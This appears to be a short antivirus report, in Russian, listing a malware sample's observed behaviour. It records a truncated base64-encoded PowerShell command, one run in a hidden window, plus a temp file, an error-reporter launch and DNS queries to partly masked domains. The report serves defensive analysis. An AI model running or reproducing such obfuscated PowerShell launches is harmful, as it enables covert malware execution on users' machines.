Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AQQBDAEQAWgBBACAAPQAgACcAMgAyADMAJwA7ACQAWQB4AEQARABBAEMAQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnADEAQQBCAGMAJwAsACcAUgBRACcAKQA7ACQAdABVADQARwBRAEEAUQA9ACQAZQBuAHYAOgB1AHMAZQByAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\1170054.cvr
- DNS ASK av###ant.com
- DNS ASK cp#.###nking-base.com
- DNS ASK gr###aksara.com
- DNS ASK ha####there.life
- DNS ASK co##do.casa
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AQQBDAEQAWgBBACAAPQAgACcAMgAyADMAJwA7ACQAWQB4AEQARABBAEMAQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnADEAQQBCAGMAJwAsACcAUgBRACcAKQA7ACQAdABVADQARwBRAEEAUQA9ACQAZQBuAHYAOgB1AHMAZQByAH... (со скрытым окном)